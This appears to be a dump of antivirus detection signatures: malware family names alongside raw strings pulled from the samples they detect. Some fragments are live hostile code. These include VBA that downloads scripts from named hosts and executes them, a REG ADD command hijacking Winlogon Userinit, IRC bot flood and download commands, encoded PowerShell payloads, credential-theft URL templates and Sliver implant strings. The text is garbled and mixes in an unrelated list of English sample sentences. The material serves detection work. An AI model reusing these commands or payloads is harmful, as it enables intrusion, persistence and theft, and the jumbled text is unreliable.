open\\internetexplorer\\iexplore.exehttp://www.tagbao.com/open >open\\internetexplorer\\iexplore.exehttp://www.tagbao.com/open !Cosmu.A !DyCode.C !Webnav.A!dll :\\windows\\system32\\index.html 360seURL\\shell\\open\\command :\\Program Files\\wisesoft\\ htmlfile\\shell\\open\\command Explorer\\iexplore.exe\" \"%1\" \\wisesoft\\config.ini \\wisesoft\\config.ini] !Banker.XO </B><SPAN id=bank-name> BANK=%s&QIAN=%s&ALIPAYNAME=%s&ALIPAYVER=%s *BANK=%s&QIAN=%s&ALIPAYNAME=%s&ALIPAYVER=%s %s/PayToMe/TB_Pay.Asp?nFlag=0&UserName=%s )%s/PayToMe/TB_Pay.Asp?nFlag=0&UserName=%s] ip.hetodo.com:8754/ip.php .hetodo.com:8080/sogouconfig/click_new_ '.hetodo.com:8080/sogouconfig/click_new_ /count.asp?mac=%s&ver=%s /count.asp?mac=%s&ver=%s] !Morix.B !Morix.B\t@ !Morix.C !Mulcss.A <$ t! %SystemRoot%\\System32\\svchost.exe -k $%SystemRoot%\\System32\\svchost.exe -k sc config UI0Detect start= disabled #sc config UI0Detect start= disabled SOFTWARE\\ODBC\\SQLLevel SOFTWARE\\ODBC\\SQLLevel] NewStart\\ADSCut_SingleQQ\\release\\ADSCut.pdb +NewStart\\ADSCut_SingleQQ\\release\\ADSCut.pdb !FakePlayer.B vnetservices.l0086.com.cn \\NethomeInfo\\MyIEData\\main.ini \\NethomeInfo\\MyIEData\\main.ini] !OnLineGames.ZEA!dll /t.asp C:\\mxdos.sys C:\\mxdos.sys] !Startpage.ZA zhenlaji tongji.aectime.com/api/ 117.40.196.202/tj7/count.asp?mac= 114search.118114.cn/search_web.html? dianxin.online.cq.cn/api/taobao/index.htm] !OnLineGames.ZDX!dll up/Upf.asp %s%s?ac=h&i=%s&h=%s %s%s?c=q&i=%s&s=%s&a=%s&m=%s&t=%d %s%s?c=q&i=%s&s=%s&a=%s&m=%s&t=%d] !QQpass.CIA d:\\sys.txt d:\\Txs.dll mm2020.usa20.ceshi6.com/SPOP/DXBPVQ/user.asp?username= &op_type=add&submit=ok &op_type=add&submit=ok&a2=&a1=&password=] !OnLineGames.ZDM!dll ?a=%s&s= &u=%s&p=%s&r=%s& &u=%s&p=%s&r=%s&] !OnLineGames.ZDV!dll /mibao.asp %s?act=&d10=%s&d80=%d ?d10=%s&d11=%s&d00=%s&d01=%s&d22=%s&d32=%s&d70=%d&d90=%d ?d10=%s&d11=%s&d00=%s&d01=%s&d22=%s&d32=%s&d70=%d&d90=%d] !Delf.ZSA .xz19.com ctfmon_ kuodousetup38_ CnIE.tmp cn.tmp  cn.exe !OnLineGames.ZED!dll %s?act=getpos&d10=%s&d80= ?a=%s&s=%s&u=%s&p=%s&pin=%s& wsidny.asp wsidny.asp] !VB.YAK kaoti.exe ahui.exe, 0 \t(C:\\WINDOWS\\system32\\ c.greenclick.cn/click?pid=23&mid=19483&channel=2&pt=df] !VB.YAB \\Hijack.exe nResurrection.bat .18286.net/?xin NaNianHuaKai] !Xwxia.A \\npdrmv.jpg\" /q /f %MYFILES%\\coopen_setup .zuihouyi.com/ a.xwxiazai.com/ .07396.com/ .07396.com/] !Inbat.A %MYFILES%\\Upd.exe %MYFILES%\\in.exe //www.xunlei100.com/msn/ //install.xinruicn.com //to2.5cnd.com/ //a.xwxiazai.com/ /bibibei /coopen_setup_ pipi\\unins000.exe\" /f  /DDHYT.exe  /pipi_dae_ /kugou_  /36a11.exe  /36a11.exe] !Kplo.A jjjjjjjh \\lpk.dll  LpkInitialize LpkInitialize] !Startpage.AEJ .k969.com P-ba4f-00a0c91eedba}\\Shell\\Start\\Command\\ ,\\iexplore.exe\" http:// lore.exe,-32528 L\\Desktop\\NameSpace\\{1f4de370-d627-11d1 $a}\\LocalizedString] !Hupigon.ZAI fUCK_AVP MyLive \\pbk\\rasphone.pbk \\perfc008.dat  [%d/%d/%d %d:%d:%d] BITSServiceMain BITSServiceMainx MmM0bV1uKjhdTTQ3ZXM1PD5Anw==@3QLz4PEC/vMCvQP7+58= HAHHHH MmM0bV1uKjhdTTQ3ZXM1PD5Anw==@3QLz4PEC/vMCvQP7+58=HAHHHH SOFTWARE\\mICRosOFT\\wINDoWs nt\\cURrENTvERsIoN\\sVcHosT %s:\\DoCumEnts And SetTinGs\\LocalSeRVice %s\\%d_Index.TEMP %s\\%d_Index.TEMP] !Hupigon.ZAJ \\teslortnoctnerruc\\ \\server.exe 36%xsvc 36%xsvc] !Hupigon.ZAK Xmfy] TQ*zR 0etVolumeInformation GT_Update \tGT_Update \\Gh0st %d \t\\Gh0st %d %s:\\Documents  ONS\\IExPLoRE.EXE\\SHelL\\ ONS\\IExPLoRE.EXE\\SHelL\\] !Agent.ABGI uRfNR Zg&uRfNR !Boaxxe.L !Delf.CO KeySpyXP KeyWord.Scroll_Lock {NUMPAD DIVIDE} DJ Mentos Motyl.exe Motyl.exe] Ransom:Win32/LockScreen.AS /c REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Userinit /t REG_SZ /d \"C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Administrator\\ 0-9.EXE\" /f !Small.DJ $lsass.exe Fail To create Snap Shot $lsass.exeFail To create Snap Shot Is GodMode: Fail Error! root$  !Delf.KM !GameHack.C .+:\\\\.+\\\\Desktop\\\\Yeni Klas.+\\\\Project1.vbp 1,.+:\\\\.+\\\\Desktop\\\\Yeni Klas.+\\\\Project1.vbp !CeeInject.gen!DY !Sinowal.AHD !Pinkblocker.gen!A  $0 *0 !VB.CR !VB.CR[@ !VB.LU createobject(\"winhttp.winhttprequest Xcreateobject(\"winhttp.winhttprequest _.open\"get\", _g/\"&\"c3\"&\"s7\"&\"z\",false _execute Keylogger.HB!bit watchwinsp.org/v2.txt shutdown /s /t 0 sendActiveEmail sendActiveEmail] VirTool:Win64/Drixed!rfn Puwin.A TrojanDownloader:PowerShell/Cobelatt $TrojanDownloader:PowerShell/Cobelatt tvpbulv\"+\"iievigewgaaaasi0d6v///0ibwzblaqd/00ijw0mj+ggeaaaawv/qqbjwtajwaauaaaba/9ma8aaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaaawg2zrunocufj6arhsegk4o7znuhz6arijvmy4khocuko8z7hyegk4njtqump6arhbapg4xxocufj6a7idegk4njtmuhj6arg0lmi4u3ocudsuy7htegk4njtoufn6arhsawnounocuaaaaaaaaaaaueuaagsgbgboptxxaaaaaaaaaadwacigcwilaabiagaasaiaaaaaaac Gendwnurl.BE!bit jbdsicoio http://img-save.xyz HKEY_CURRENT_USER\\Software\\Classes\\steam\\Shell\\Open\\Command] Gendwnurl.BJ!bit http://47.89.187.54  .rar C:\\TEMP /k DownloadFile] Gendwnurl.BK!bit http://ckpetchem.com entrypoint invoke !Tinba.H!bit 83\":f6 !SpyEyes !Cowmf.A !VBCrypt.A Virus:Win64/Expiro.EN!bit QRGUJ AUAVAWH !Zuepan.A application/xhtml+xml %s%08x.%s /c start \"\" \"%s\" 88C3D173715405943DF9AA0DA0C9893B BD75476FE8B74F9F2EF73E9128F946F5 !Jscrpt.A!bit !Farfli.PN!bit TCPConnectFloodThread.target http://119.249.54.113/ HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0] !Swotter.A!bit !Swotter.A!bitD@ k<-OrZ  NDXag S(iKOrZ S~,`|  vwM@x oe Wb~ !CeeInject.RT!bit That plumber lent her a lot of money Joe struck him a heavy blow That guard sold him a ticket That journalist showed them a photograph That carpenter struck him a heavy blow Lesters ex-wife orders her a new hat Willie bought her a gift Jackie strikes him a heavy blow Stephen struck him a heavy blow Those police officers offered her a ride home That student saved her a seat Betty gives him a magazine Ed ordered her a new dress Abraham gives him a magazine Those scientists told her the shortest way Miss Johnson envied him his good fortune That janitor shows them a picture Abraham brought her a small present Debbie taught them English Ned sends him a package Those taxi drivers make him some coffee That manager read the children a story That teacher wrote her a letter Albert lends him a pencil Ann Lynn sent him a package Willie bought her a gift Joannes mother offers her a bribe Those science teachers buy her a gift Joannes mother offers her a bribe Those science teachers buy her a gift] !Skeeyah.A.bit I\tNLGB !CeeInject.SB!bit !Kryptik.FZTF ;* 'C !Azden.A !Kuiper !WebOpen.A !Totecx Ransom:Win32/Crypren Trojan:O97M/Bailiwick.B CoinSteal.A!bit bytecoinwallet.wallet CryptoService.pdb dsciuyizhiuuc.php?type=] !Kasidet.G!bit Xl5jVVxcVWIx CoinMiner.KA!bit !CoinMiner.OS!bit !Turla 2-'1Y !VBRan Ransom:MSIL/WannaPeace.A C}+x{ !Pynamer.B!ac  ]a eg Jw# !Pynamer.A!ac % G+r 6 {l> ** *M'*^Y RUxp    IqV :pqK= Y.+uO V1r-28 |zO-0  nqbhg /H (z\" /H [4 ' GvU h> rZ 10feW !Plimrost fileinstall(\"encrypted.data\",@tempdir&\"\\ 0\",1)$  =fileread(@tempdir&\"\\ 0\")global$ P=_base64decode($  ,\"\",@scriptfullpath) TrojanDownloader:PowerShell/Falsip.B $TrojanDownloader:PowerShell/Falsip.B !Schopets.O Nscript:Type_vbs&(SCPT:VBS/Obfuscator.Split.Adodb.A|SCPT:VBS/Obfuscator.Split.FileSystemObject.A|SCPT:TrojanDownloader:VBS/Schopets!SaveToFile)&(SCPT:VBS/Obfuscator.Reverse.ResponseBody|SCPT:Schopets!ReverseHttp|SCPT:Schopets!ReverseXmlHttp|SCPT:Schopets!ReverseAdodbStream|SCPT:Schopets!ReverseWscriptShell)] !Schopets.OB InEmail&AGGR:SingleVBSInArchive&Nscript:Type_vbs&(SCPT:VBS/Obfuscator.Split.Adodb.A|SCPT:VBS/Obfuscator.Split.FileSystemObject.A|SCPT:TrojanDownloader:VBS/Schopets!SaveToFile|SCPT:VBS/Obfuscator.Reverse.ResponseBody|SCPT:Schopets!ReverseHttp|SCPT:Schopets!ReverseXmlHttp|SCPT:Schopets!ReverseAdodbStream|SCPT:VBS!Obfuscator.Split.CmdExe)] CoinSteal.B!bit VictimLogs BitcoinWallet SendUrlAndExecute get_Screenshot get_Screenshot] Nekozillot.A!bit \\AppData\\Local\\Amigo\\User Data\\Default\\History http://zillot.kz/System/mysql/users.php regsetauto RisingForce2] SupportScam:MSIL/Payreen.A Q F/] 3\tN@U Q F/] Q F/] Trojan:Win64/CoinMiner.OT!bit !Gendelfan.F!bit Trojan:Win64/Wdfload.M!bit CoinMiner.OU! Elkcro.A Erebus Final Final\t@ Firhel.A Flood.AU Flood.BR Flood.C Flood.DH Flood.E Flood.F Flood.G Flood.I Flood.P Flood.T Flood.V Flood.W Flood.X +0UOu Froze Girc.17 Girc_181.A Goodbot Grimgram Hetrad Iblis Iland.A Informa.A InSpic Iover.A Iroffer Jerret.A Jerret.D Judge sockwrite-nsockcloneprivmsg%jd.dachan:3,1doneudpflooding$2 <sockwrite-nsockcloneprivmsg%jd.dachan:3,1doneudpflooding$2 Karmahotel Lambot.A Lamebot Menak Mesut Mimic Mimic.C Mimic.E Mimic.F n2=msdossettings.inin3=fatsys.inin4=namesserver.ini 5n2=msdossettings.inin3=fatsys.inin4=namesserver.ini r4ndom.server{return$gettok(irc.nitro.net:irc.dal.net:irc.austnet.org:irc.webchat.org:irc.infatech.net,$rand(1,5),58)} xr4ndom.server{return$gettok(irc.nitro.net:irc.dal.net:irc.austnet.org:irc.webchat.org:irc.infatech.net,$rand(1,5),58)} Mircer.A Momma Momma.A Momma.A\t@ ={Quu ={Quu( Momma.C //run$mircdir$+winsok .sockwrite-ndlgethttp://$+%usite2$+/$+%fileini 0.sockwrite-ndlgethttp://$+%usite2$+/$+%fileini Momma.D , ^B|7 Movie.A Moyt.A Moyt.B Mutin.A Muzik Niqim Noclose n0=/join#![0wn3d$chr(36)$+nulln1=/timer060/join#![0wn3d$chr(36)$+null Gn0=/join#![0wn3d$chr(36)$+nulln1=/timer060/join#![0wn3d$chr(36)$+null {?<D] PPack Randon.AE Randon.L Randon.S Regie.A Reklam.A Reklam.C Reklam.D Reklam.E Reklam.F Reklam.I Sensi.11 Shiznat.C Sipg.A Slowdown Smev.B Speed.A Tawb.A Temper Thea.A Thorin.11932 Tkbot Trilissa.J Tzet.A Upaga Whisper.A AAssign 0oUOo AAssign.A ABizex.A ABlast.A ABomgen.B ]5JW ABomgen.C ABomgen.D ABomgen.E ABomgen.P AChango ACobase.A AConcon tYg&`i ADavinia ADriveFormat.A ADropperAppl.A AFakehost AFofiv.A AGhostdog.A AHTADropper.A AIestart.E AInformer AInor AInor.AR AInor.BB AInor.BE AInor.BL CIwillbased AKillfiles.B ALooper.B ALooper.D AMarfan.A AMimail.R ANyrobot.A AObjdata AParams.D APaula APsyme.N ARapa AResizer.A ARunner.A ASeeker.C AShowhelp.A ASmall ASmall$@ I1(C\t `sg&| Gx1wbJPv ASmall.A ASmall.D ASmall.F ASpthgen AStartpage.F ATalkStocks.A AVBSWG.C AVoodoo.A AVoodoo.C AWhitehome AWindowbomb.C AWipe.A AZivaExploit Trojan:ABAP/Cadabra DoS:ABAP/Delan.A Trojan:ABAP/Delins.A Worm:ABAP/Rapid.A Backdoor:ABAP/Rivpas.D !SerialThief Virus:ALisp/Pobresito.A Virus:ALisp/Bursted.A Virus:AmiPro/Amiv Trojan:ANSI/Bart Trojan:ANSI/Spehelp Monster.6109 Backdoor:ASP/Ace.B Backdoor:ASP/Ace.C Backdoor:ASP/Ace.D Backdoor:ASP/Ace.F TrojanDropper:ASP/Cobase Backdoor:ASP/Sql Backdoor:ASP/Uxor.A Trojan:ASX/Conp SillyTroj Worm:BAS/Alba  Trojan:BAS/Alpha.A Virus:BAS/Bv3 * TrojanDropper:BAS/Clobus.A Worm:BAS/Craytron Worm:BAS/Junkrem Worm:BAS/Trash.A Virus:BAS/Xyc * Trojan:CorelScript/CST.A Virus:CorelScript/CSV.A Trojan:CorelScript/PVT.A !IISCmd Block Block.A Trojan:HC/BangSpice.A Trojan:HC/HC_9603.A Trojan:HC/MerryXmas.A Backdoor:HE/Flys.A Trojan:HE/Flys.B Exploit:HTA/Behind.A Exploit:HTA/Showhelp Exploit:HTA/Wareme.A Virus:HTML/Abbum.A Exploit:HTML/Ability Trojan:HTML/Alcaul.F Worm:HTML/Alcaul.M Worm:HTML/Alcaul.Q Exploit:HTML/AnyMail TrojanDownloader:HTML/Balder.A TrojanSpy:HTML/Bayfraud.A Virus:HTML/Blowup Trojan:HTML/Briss.A Trojan:HTML/ByteVerify.A Trojan:HTML/CardStealer Trojan:HTML/Citifraud.A TrojanSpy:HTML/Citifraud.I = Asc(Mid(  Mod Len( + Sheet2.Range(  + CStr( )).Value , \".\") , \"::\") = ThisWorkbook.Name Print #1, = \"\"] !Bynoco!lnk Exploit:Win64/Revsell.A cmd.exe%s%s Ransom:Win32/Maze.Q!MSR Killyourself.dll wchCrypt32 dwShellCodeSize TrojanDownloader:AndroidOS/Banker!MSR %TrojanDownloader:AndroidOS/Banker!MSR TrojanSpy:AndroidOS/Fakecop!MSR Exploit:AndroidOS/Lotoor.A!rfn !Keylogger.AA!MSR !Downloader.AU!rfn TrojanDownloader:O97M/Obfuse.AA!MTB #TrojanDownloader:O97M/Obfuse.AA!MTB = CreateObject(\"Scripting.FileSystemObject\") Wicmd.CreateFolder \"C:\\pic1\\\" = \"C:\\pic1\\Build16.cmd\" \"start c:\\pic1\\ PreviewPreview2.exe\" TrojanDownloader:PowerShell/Elshutilo.AJ!MTB ,TrojanDownloader:PowerShell/Elshutilo.AJ!MTB Replace(f1, \"/\\\", \"2\")) Replace(\"Pow#&*$%ell\", \"#&*$%\", \"ersh\")) Application.ExecuteExcel4Macro (  + \"\"\"\" +   + \"\"\"\" + \", \" + \"\"\"\" +   + \"\"\"\" + \", \"\"\"\", 0)\") TrojanDownloader:PowerShell/Elshutilo.PS!MTB ,TrojanDownloader:PowerShell/Elshutilo.PS!MTB Dim si As STARTUPINFO Ret3 = Environ$(\"APPDATA\") + \"\\pay1.ps1\" Ret2 = URLDownloadToFileA(0, \"http://kredytinksao.pl/raw.txt\", Ret3, 0, 0) Ret2 = URLDownloadToFileA(0, \"http://wpr.mko.waw.pl/uploads/scheduler.txt\", Ret3, 0, 0) Ret7 = CreateFileA(Ret3, 1, 2, sa, 3, 0, 0) Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi) Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi)] !CryptInject.SK!MTB 307835333734373236393645363735323635373636353732373336353238323436343239 30783434364336433533373437323735363337343433373236353631373436353238323236323739373436353230 0x40486f6d654472697665202620225c5c5c5c57696e646f77735c5c5c5c4d6963726f736f66742e4e45545c5c5c5c4672616d65776f726b5c5c5c5c ( $URL , $PATH ) = STRINGREPLACE (  ( $FILE , $STARTUP , $RES , $RUN = 3078343636393643363534463730363536453238 = \"WriteProcessMemory = STRINGREGEXPREPLACE ( $SITEM , \"^Row\\s\\d+\\|(.*)$\" , \"$1\" ) = STRINGREGEXPREPLACE ( $SITEM , \"^Row\\s\\d+\\|(.*)$\" , \"$1\" )] !Delpem.A!cry SIGATTR:DelphiFile&HSTR:DelphiPacker.A] *&SIGATTR:DelphiFile&HSTR:DelphiPacker.A] Empyre.D!MTB TrojanDownloader:O97M/Obfuse.LHO!MTB $TrojanDownloader:O97M/Obfuse.LHO!MTB TrojanDownloader:O97M/Obfus.B!MTB !TrojanDownloader:O97M/Obfus.B!MTB (\"wscript //nologo c:\\Colorfonts32\\visitcard.vbs  @ c:\\Colorfonts32\\secpi15.exe start c:\\Colorfonts32\\secpi15.exe LoadScriptVBS GetObject(HashTable()), \"c:\\Colorfonts32\\B4D9D02119.cmd\", 0 LoadScriptVBS GetObject(HashTable()), \"c:\\Colorfonts32\\B4D9D02119.cmd\", 0] TrojanDownloader:O97M/Macrobe.BD!MTB $TrojanDownloader:O97M/Macrobe.BD!MTB cvcviagens.sslblindado.com/ htahtml\" var0 = \"MSHTA https://  :var0 = \"MSHTA https:// Shell (Var) Shell (Var)] Trojan:HTML/Phish.L!MTB tmss-ict.com/include/result.php\"> Itmss-ict.com/include/result.php\"> <formmethod=\"post\"action=\"https://  C<formmethod=\"post\"action=\"https:// ARedirector.BD!MTB a-z=0; a-z.length; 0-9;if(( a-z)==true)&&( 0-9)&&( )==false)){ a-z=eval( !MemoryInjection.A!MTB !Pydcrypter.A!MTB AKoadicPersist.A case0x80000001 ;case0x80000001 k0adic 0regdelete p%appdata%\\\\  .hta\" Trojan:Python/Febrev.A importmarshal cs=s@*ket.s@*ket(s@*ket.af_inet,s@*ket.sock_stream) gs.re*v(2048) kw?n32.^rz2 ire]zy=@]en(\\'w?n32.^rz\\',\\'r+\\') n*urrent_q?r=(@s.!et*wq()) urrent_user+*urrent_q?r !Splinter.A!MTB sliverpb.NetInterface sliverpb.WGSocksServer sliverpb.PortfwdProtocol sliverpb.WGTCPForwarder .sliverpb.RegistryType .sliverpb.RegistryTypex sliverpb.Register.ActiveC2 sliverpb.KillSessionReq sliverpb.Register.PidPid sliverpb.IfconfigReq sliverpb.TerminateReq sliverpb.NetInterfaces sliverpb.NetInterfacesx /xc/load.go main.bake syscall/zsyscall_windows.go *sliverpb.Process *sliverpb.  Info *sliverpb.Migrate *sliverpb.Elevate *sliverpb.Kill *sliverpb.DNSPoll *sliverpb.DNSBlockHeader *sliverpb.ExecuteAssemblyReq *sliverpb.ImpersonateReq *sliverpb.ImpersonateReqxz ).GetPid ).GetFilename ).GetActiveC2 ).GetVersion ).GetReconnectInterval ).GetProxyURL ).GetExecutable ).GetOwner ).GetSessionID ).GetCmdLine ).GetTargetLocation ).GetReferenceDLL ).GetTargetDLL ).GetProfileName ).GetUsername ).GetPassword ).GetDomain ).GetRequest ).GetProcessName ).GetArgs ).GetEntryPo